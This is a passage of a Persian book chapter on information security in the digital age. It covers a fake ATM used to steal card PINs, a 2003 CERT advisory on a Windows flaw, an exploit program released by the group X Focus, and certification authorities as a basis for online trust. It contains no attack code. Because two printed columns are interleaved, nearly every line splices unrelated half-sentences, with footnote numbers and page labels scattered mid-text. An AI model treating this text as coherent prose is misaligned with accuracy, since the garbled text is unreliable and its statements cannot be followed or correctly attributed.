ﺷﻤﺎﺭﺓ ﺭﻣﺰ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻣﻲﻛﺮﺩﻧﺪ ،ﺍﻳﻦ ﺩﺳﺘﮕﺎﻩ ﺟﻌﻠﻲ ﺑﺎ ﺫﺧﻴـﺮﺓ ﺍﺳﺖ ﺑﺪﻭﻥ ﺧﻄﺮ ﺑﺎﺷـﻨﺪ ،ﻫﺮﮔـﺰ ﻛـﺴﻲ ﻣﻄﻤـﺌﻦ ﻧﻴـﺴﺖ ﺁﺛـﺎﺭ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻌﺪﻱ ﺑﻪ ﺍﻳـﻦ ﺣـﺴﺎﺑﻬﺎ ﺭﺍ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬـﺎ ﺩﻗﻴﻘـﹰﺎ ﭼﻴـﺴﺖ .ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺍﻳـﻦ
ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﻣﻲﻛﺮﺩ ،ﺍﻣﺎ ﭼﻮﻥ ﺍﺗﺼﺎﻟﻲ ﺑﺎ ﻣﺮﺍﻛﺰ ﻭﺍﻗﻌﻲ ﺍﻋﺘﺒـﺎﺭﻱ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺍﻳـﻦ ﺍﺑـﺰﺍ ﹺﺭ
ﻧﺪﺍﺷﺖ ﻗﺎﺩﺭ ﺑﻪ ﺗﻜﻤﻴﻞ ﻋﻤﻠﻴﺎﺕ ﻣﺎﻟﻲ ﻧﺒﻮﺩ .ﺩﺭ ﻳﻚ ﻣﻮﺭﺩ ﺩﻳﮕـﺮ ﺑﻪﺍﺻﻄﻼﺡ ﺑﻲﺧﻄﺮ ﺑﺘﻮﺍﻥ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻛـﻪ
ﺳﺎﺭﻗﻴﻦ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺑﻪ ﻧﺤﻮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ ﻛـﻪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬﺎ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﺁﺳﻴﺐ ﻭﺍﺭﺩ ﻛﺮﺩ .ﺩﺭ
ﺍﻣﻜﺎﻥ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﻣـﺪﺗﻲ ﺑﻌـﺪ ﻭ ﺑـﺎ ﺍﺩﺍﻣﻪ ،ﻳﻚ ﻧﻤﻮﻧﻪ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ:
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺛﺒﺖﺷﺪﻩ ﺍﻗﺪﺍﻡ ﺑﻪ ﺳﺮﻗﺖ ﻣﻲﻧﻤﻮﺩﻧﺪ. ﺳﻨﺪ CA-203-18ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬـﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﻞ ﻣﺸﺎﻫﺪﻩ ﺩﺭ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﺗﻮﺳﻂ ﺍﻓـﺮﺍﺩﺍﮔﺮﭼﻪ ﺑﻴﺸﺘﺮ ﺟﺮﺍﺋ ﹺﻢ ﻗﺎﺑ ﹺ ﺁﺧﺮﻳﻦ ﺣﻔﺮﺓ Windowsﺭﺍ ﻣﺴﺘﻨﺪ ﻛﺮﺩﻩ ،ﻭ CNetﻧﻴﺰ
ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ،ﻭﻟﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻣﺆﺳـﺴﺎﺕ ﻧﻴـﺰ ﻗـﺎﺩﺭ ﺑـﻪ ﺳـﻮﺀ ﮔﺰﺍﺭﺵ ﺩﺍﺩﻩ ﻛﻪ ﺑﺎ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺍﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺑﺮﺍﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﺍﻳـﻦ ﻓـﻀﺎ ﺑـﺮﺍﻱ ﺭﺳـﻴﺪﻥ ﺑـﻪ ﺍﻫـﺪﺍﻑ ﻧﻔﻮﺫ ﺑﻪ Windowsﺭﺍﻩ ﺑﺮﺍﻱ ﻇﻬﻮﺭ ﺑـﺮﻕﺁﺳـﺎ ﻭ ﺣﻤﻠـﺔ
ﺳﺎﺯﻣﺎﻧﻲ ﺧﻮﺩ ﻫﺴﺘﻨﺪ .ﺟـﺮﺍﺋﻢ ﺳـﺎﺯﻣﺎﻧﺪﻫﻲﺷـﺪﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺷﺪﻳﺪ ﻳﻚ ﻛﺮﻡ ﺩﻳﮕﺮ ﻫﻤﻮﺍﺭ ﻣﻲﺷﻮﺩ:
ﺩﺳﺘﻜﺎﺭﻱ ﺩﺭ ﺷﺒﻜﺔ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﺭﺳﻴﺪﻥ ﺑـﻪ ﻧﺘـﺎﻳﺞ ﻣﻄﻠـﻮﺏ ﭘﮋﻭﻫﺸﮕﺮﺍﻥ ﺍﻣﻨﻴﺘﻲ ﻫـﺸﺪﺍﺭ ﺩﺍﺩﻩﺍﻧـﺪ ﻛـﻪ ﻳـﻚ ﮔـﺮﻭﻩ ﺍﺯ
ﺁﻧﻬﺎ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﻋﻠﻴـﻪ ﺩﻳﮕـﺮﺍﻥ ﻧﻴـﺰ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﻣﻨﺘـﺸﺮ ﻛـﺮﺩﻩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺳـﻮﺀ
ﺑﺸﻮﺩ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻋﻼﻗـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺍﺷﻜﺎﻝ ﻋﻤﺪﺓ Windowsﻃﺮﺍﺣﻲ ﺷـﺪﻩ
ﻧﺘﻴﺠﺔ ﻳﻚ ﻧﻈﺮﺳﻨﺠﻲ ﻳﺎ ﺣﺘﻲ ﺍﻧﺘﺨﺎﺑﺎﺕ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻛﻨﻨـﺪ ﺗـﺎ ﻭ ﺭﺍﻩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠـﺔ ﺑـﺰﺭﮒ ﺗـﺎ ﺍﻭﺍﺧـﺮ ﻫﻔﺘـﺔ
ﺑﻪ ﻧﺘﺎﻳﺞ ﻣﻄﻠﻮﺏ ﺧﻮﺩ ﺑﺮﺳﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ ﻣﺆﺳﺴﺎﺕ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ
ﺟﺎﺭﻱ ﺑﺎﺯ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﻫﺸﺪﺍﺭ ﺭﻭﺯ ﺟﻤﻌﻪ ﺍﻋﻼﻡ ﺷﺪ؛ ﺑﻌـﺪ
ﺭﻭﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩﺍﻧﺪ ﻭ ﻣﻤﻜـﻦ ﺍﺯ ﺁﻧﻜﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﭼﻴﻨﻲ ﮔﺮﻭﻩ ﺍﻣﻨﻴﺘـﻲ X Focusﻣـﺘﻦ
ﺍﺳﺖ ﺑﺘﻮﺍﻧﻨﺪ ﺗﺎ ﻣﺪﺗﻬﺎ ﺁﻧﺮﺍ ﻫﻤﭽﻨﺎﻥ ﺑﺎ ﻗﻮﺕ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ. ﺑﺮﻧﺎﻣﻪﺍﻱ ﺭﺍ ﺑﺮﺍﻱ ﭼﻨﺪﻳﻦ ﻣﺮﻛﺰ ﺍﻣﻨﻴﺘﻲ ﺩﻧﻴﺎ ﻣﻨﺘﺸﺮ ﻛﺮﺩﻧﺪ
ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﻣﻨﺎﻓﻊ ﺑﺎﻟﻘﻮﺓ ﻣﻮﺟﻮﺩ ﺩﺭ ﻋـﺼﺮ ﻧـﻮﻳﻦ ﺩﻳﺠﻴﺘـﺎﻝ ﻛﻪ ﺑﺎ ﻃﺮﺍﺣﻲ ﻣﺎﻫﺮﺍﻧﻪ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﺍﺭﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ
ﺑﻴﺸﻤﺎﺭ ﻫﺴﺘﻨﺪ .ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳـﺖ ﻛـﻪ ﺑـﺎ ﺍﻳﻤـﻦﺳـﺎﺯﻱ Windowsﻧﻔﻮﺫ ﻣﻲﻛﺮﺩ.
ﻣﺤﻴﻂ ﻓﻴﺰﻳﻜﻲ ،ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ،ﺭﺍﻳﺎﻧﻪ ﻫﺎ ،ﺧﻄﻮﻁ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﻣﻨـﺎﺑﻊ ﺑﺮﻧﺎﻣـــﺔ ﮔـــﺮﻭﻩ X Focusﺍﺯ ﺍﺷـــﻜﺎﻝ ﻣﻮﺟـــﻮﺩ ﺩﺭ
ﻲ ﺧﻮﺩ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﻓﻊ ﺣﻔﺎﻇﺖ ﻛﻨﻴﻢ .ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺩﺭ ﺍﻧﺠﺎﻡﺍﻃﻼﻋﺎﺗ ﹺ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﻬﺮﻩﺑـﺮﺩﺍﺭﻱ ﻣـﻲﻛﻨـﺪ ﻭ ﺑـﻪ
ﺍﻳﻦ ﻣﻬﻢ ﺭﺳﻴﺪﻥ ﺑﻪ ﺳﻄﺢ ﺷﻨﺎﺧﺖ ﻛﺎﻓﻲ ﻭ ﺻﺤﻴﺢ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﻣﻜﺎﻥ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﻣـﻲﺩﻫـﺪ.
ﻲ
ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺍﺗﺨﺎﺫ ﺗﺼﻤﻴﻤﺎﺕ ﻋﺎﻗﻼﻧﻪ ﺩﺭﺑﺎﺭﺓ ﭼﮕﻮﻧﮕ ﹺ ﺍﻳــﻦ ﺍﺷــﻜﺎﻝ ﺗﻮﺳــﻂ ﭼﻨــﺪ ﻧﻔــﺮ ﺍﺯ ﻣﺘﺨﺼــﺼﻴﻦ ﺑﻌﻨــﻮﺍﻥ
ﺭﺳﻴﺪﻥ ﺑﻪ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﺎ ﻛﻤﻚ ﻛﻨﺪ .ﺑـﺴﻴﺎﺭﻱ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺍﺷﻜﺎﻟﻲ ﻛﻪ ﺗـﺎ ﻛﻨـﻮﻥ ﺩﺭ Windowsﻳﺎﻓـﺖ
ﺍﺯ ﻣﺎ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﭼﻨﺪﻳﻦ ﻧﻘـﺶ ﺭﺍ ﺑـﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﻳـﻢ :ﻣﻤﻜـﻦ ٦١
ﺷﺪﻩ ﻣﻌﺮﻓﻲ ﺷﺪﻩ ﺍﺳﺖ.
ﺍﺳﺖ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﻴﻢ ،ﺩﺭ
ﻗﺒﺎﻝ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻭ ﺧﺪﻣﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﺣﻤﻼﺕ ﺭﻭﺯﺍﻓﺰﻭﻧﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻧـﺴﺒﺘﹰﺎ ﻏﻴﺮﺣﺮﻓـﻪﺍﻱ ﺍﻧﺠـﺎﻡ
ﻣﺴﺌﻮﻟﻴﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ ،ﻭ ﻳﺎ ﺑﻪ ﻫﻤﻜﺎﺭﻱ ﺑـﺎ ﺩﻭﻟـﺖ ﺩﺭ ﺍﺟـﺮﺍﻱ ﻣﻲﺷﻮﻧﺪ ﻧﻴﺰ ﻣﺎﺟﺮﺍﻳﻲ ﻃﻮﻻﻧﻲ ﻭ ﺩﻧﺒﺎﻟﻪﺩﺍﺭ ﺍﺳﺖ.
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﻤﺎﻳﺘﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻋﻼﻗﻪﻣﻨﺪ ﺑﺎﺷﻴﻢ. ﺍﻟﺒﺘﻪ ﺗﻤـﺎﻣﻲ ﻧﻘـﺾ ﺣﺮﻳﻤﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﺨـﺘﺺ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ
ﻫﻤﺔ ﻣﺎ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻧﻘﺸﻬﺎ ﺩﺭ ﻗﺒﺎﻝ ﺗﺤﻘﻖ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺴﺘﻨﺪ .ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ ﻧﻴـﺰ ﺗـﺎ ﻛﻨـﻮﻥ ﺑـﺮﺍﻱ
ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﺴﺌﻮﻝ ﻫـﺴﺘﻴﻢ .ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ .ﺩﺭ ﻳﻚ
ﻻ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺍﻣﻨﻴـﺖ ﺿـﻌﻴﻔﺘﺮﻳﻦ ﺟـﺰ ِﺀ ﺁﻥ ﻣﺤـﻴﻂ
ﭘﻴﭽﻴﺪﻩ ﻣﻌﻤﻮ ﹰ ﻣﻮﺭﺩ )ﺩﺭ ﺍﻳﺎﻟﺖ ﻛﺎﻧﻜﺘﻴﻜﺎﺕ ٦٢ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ( ﺳﺎﺭﻗﻴﻦ ﺍﻗﺪﺍﻡ ﺑﻪ ﻧـﺼﺐ
ﺍﺳﺘﺤﻜﺎﻡ ﺩﺍﺭﺩ؛ ﺍﺯ ﺍﻳﻨﺮﻭ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﻢ ﻛﻪ ﺍﺟﺰﺍﻱ ﻣﺤﻴﻄـﻲ ﺩﺳﺘﮕﺎﻫﻲ ﺷﺒﻴﻪ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺩﺭ ﻳﻚ ﻣﺮﻛﺰ ﺧﺮﻳﺪ ﻛﺮﺩﻧـﺪ.
ﻦ
ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻛﻨﺘﺮﻝ ﺩﺍﺭﻳﻢ ﺁﻧﻘﺪﺭ ﻗﻮﻱ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺿـﻌﻴﻔﺘﺮﻳ ﹺ
61 CNet News.com ,July 25,2003
62 Connecticut State
٤١ ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺿﺮﻭﺭﻱ ﺍﺳﺖ ،ﺍﻣﺎ ﺑﻪ ﻳﻚ ﺭﺍﻫﻜـﺎﺭ ﺟـﺎﻳﮕﺰﻳﻦ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﻳﺖ ﺁﻧﻬﺎ ﻫﻢ ﺍﺯ ﺗﻮﺍﻧﺎﻳﻲ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﻬﺪﻳـﺪﺍﺕ ﻣﻮﺟـﻮﺩ ﺑﺮﺧـﻮﺭﺩﺍﺭ
ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺧﺮﻳﺪ ﻣﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﺩ؛ ﺭﻭﺷـﻲ ﻛـﻪ ﺍﮔـﺮ ﺑـﺪﻭﻥ ﺍﺳﺖ.
ﺑﺨﺶ ﺍﻭﻝ
ﻣﺮﻛﺰ ﺗﺎ ﻣﺮﻛﺰ ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ؛ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻼ ﺍﺯ
ﺷﺨﺺ ،ﻳﻚ ﻓﺮﺁﻳﻨﺪ ،ﻳﺎ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ؛ ﻣـﺜ ﹰ
ﺑﻪ ﺍﺛﺒﺎﺕ ﻛﺎﻣﻞ ﻫﻮﻳﺖ ﺷﻤﺎ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺳﺎﻳﺮﻳﻦ ﺗﻄﺎﺑﻖ ﻣﺸﺎﻫﺪﺍﺕ ﻓﻌﻠﻲ ﺑﺎ ﺗﺠﺮﺑﻴﺎﺕ ﻭ ﺩﺍﻧـﺴﺘﻪﻫـﺎﻱ ﻗﺒﻠـﻲﻣـﺎﻥ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﭽﻪ ﻛﻪ ﺑﻴﺎﻥ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﺑﭙﺬﻳﺮﻧﺪ. ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻴﻢ .ﺣـﻴﻦ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ
ﺑﻴﺸﺘ ﹺﺮ ﺷﺎﺧﺼﻬﺎﻱ ﻏﻴﺮ ﺷﻔﺎﻫﻲ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺍﺯ ﺩﺳـﺖ ﻣـﻲﺭﻭﻧـﺪ.
ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﻳـﻦ ﻣﺸﺨـﺼﺎﺕ ﺭﺍ ﺑـﻪ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨـﻴﻢ ﻳـﺎ ﺻـﻔﺤﺔ
ﺍﺷﺘﺮﺍﻙ ﻣﻲﮔﺬﺍﺭﻧﺪ .ﺳﻄﻮﺡ ﻣﺘﻌﺪﺩ ﺗﺄﻳﻴﺪ ﻫﻮﻳـﺖ ﺑـﺮﺍﻱ ﺩﺭﺟـﺎﺕ
ﻭﺑﻲ ﺭﺍ ﻣﻲﺧﻮﺍﻧﻴﻢ ،ﻧﻤﻲﺗﻮﺍﻧﻴﻢ ﻫﻤﻴﺸﻪ ﺑﮕﻮﺋﻴﻢ ﻛﻪ ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ
ﻣﺨﺘﻠﻒ ﺍﻃﻤﻴﻨﺎﻥ ﺍﻳﺠﺎﺩ ﻣﻲﺷﻮﺩ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﮔﻮﺍﻫﻴﻬﺎ ﺗﻨﻬـﺎ
ﺩﻗﻴﻖ ﺑﻮﺩ ﻭ ﺍﮔﺮ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﺮﺩﻳﻢ ﻣﺸﺨﺺ ﻣﻲﺷﺪ ﻛـﻪ
ﺩﺭ ﺳﻄﺢ ﺧﻮﺩ ﻣﻌﺘﺒﺮ ﻣﻲﺑﺎﺷﻨﺪ .ﻟﺬﺍﺳﺖ ﻛﻪ ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺻﺤﻴﺢ ﻧﻴﺴﺘﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﻧﻤﻲ ﺩﺍﻧﻴﻢ ﻛـﻪ ﺧﻄﺎﻫـﺎﻱ ﻭﺍﻗـﻊﺷـﺪﻩ
ﺑﻨﻈﺮ ﺑﺮﺳﺪ ﻛﻪ ﻭﺟﻮﺩ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑـﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ
ﻧﺘﻴﺠﻪ ﺳﻬﻞﺍﻧﮕﺎﺭﻱ ﻫﺴﺘﻨﺪ ﻳﺎ ﺗﻼﺷﻬﺎﻳﻲ ﺗﻌﻤﺪﻱ ﺑـﺮﺍﻱ ﻓﺮﻳـﺐ
ﺑﻪ ﺗﻤﺎﻣﻲ ﺍﻫﺪﺍﻑ ﻣﻮﺭﺩ ﻧﻈـﺮ ﻛـﺎﻓﻲ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﭼﻨـﺪﻳﻦ ﻣﺮﻛـﺰ
ﺩﺍﺩﻥ ﻣﺎ .ﺩﺭ ﻏﻴﺎﺏ ﺍﻃﻼﻋﺎﺕ ﺣﺘـﻲ ﺩﻳﮕـﺮ ﻧﻤـﻲﺩﺍﻧـﻴﻢ ﻛـﻪ ﺁﻳـﺎ
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺩﻧﻴﺎﻱ ﻣﺠﺎﺯﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﺑـﺎ
ﻧﻮﻳﺴﻨﺪﺓ ﻳﻚ ﭘﻴﺎﻡ ﻫﻤﺎﻥ ﺷﺨﺼﻲ ﺍﺳﺖ ﻛﻪ ﺧﻮﺩﺵ ﺍﺩﻋﺎﻱ ﺁﻧﺮﺍ
ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﮔــﻮﺍﻫﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،٦٦ﺍﻳــﻦ ﮔﻮﺍﻫﻴﻬــﺎ ﻣــﻲﺗﻮﺍﻧﻨــﺪ
ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ.
ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻣﻀﺎ ﺷﻮﻧﺪ ﻭ ﺍﻳﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﻨـﺪ
ﻛــﻪ ﮔــﻮﺍﻫﻲ ﻣﻨﺘﻘــﻞ ﺷــﺪﻩ ﺻــﺤﻴﺢ ﻭ ﺣﻘﻴﻘــﻲ ﺍﺳــﺖ .ﺍﻳــﻦ ﻣﺴﻠﻢ ﺍﺳﺖ ﻛﻪ ﻓﺮﻳﺒﻜﺎﺭﻱ ﺩﺭ ﺟﻬﺎﻥ ﻭﺍﻗﻌﻲ ﻧﻴـﺰ ﺭﺥ ﻣـﻲ ﺩﻫـﺪ،
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺗﺠﺮﺑﻲ ﻭ ﺷـﻬﻮﺩﻱ ﻛـﻪ ﻻ ﺗﻌﻴـﻴﻦ ﺣﻘﻴﻘـﺖ ﺩﺭ ﺷـﺮﺍﻳﻄﻲ ﻛـﻪ ﺍﻓـﺮﺍﺩ ﺑـﺼﻮﺭﺕﻭﻟﻲ ﻣﻌﻤﻮ ﹰ
ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ ﻣـﺴﺘﺤﻜﻢﺗـﺮ ﻓﻴﺰﻳﻜﻲ ﻭ ﻣﻜﺎﻧﻬﺎ ﺑﺼﻮﺭﺕ ﻭﺍﻗﻌﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ.
ﻫﺴﺘﻨﺪ .ﺩﺭ ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻋﺘﻤﺎﺩ ﻻﺯﻡ ﺟﻬـﺖ ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺍﺯ ﻃﺮﻳﻖ ﻣﺮﺍﻛﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ٦٥ﺑـﻪ ﺍﻳـﻦ ﺑﻌـﺪ ﺍﺯ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺍﻧﺠﺎﻡ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﻣـﺎﻟﻲ ﺍﻣﻨﻴﺖ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻛﻤﻚ ﺯﻳﺎﺩﻱ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﻣﺮﺍﻛﺰ ﺑـﺮﺍﻱ
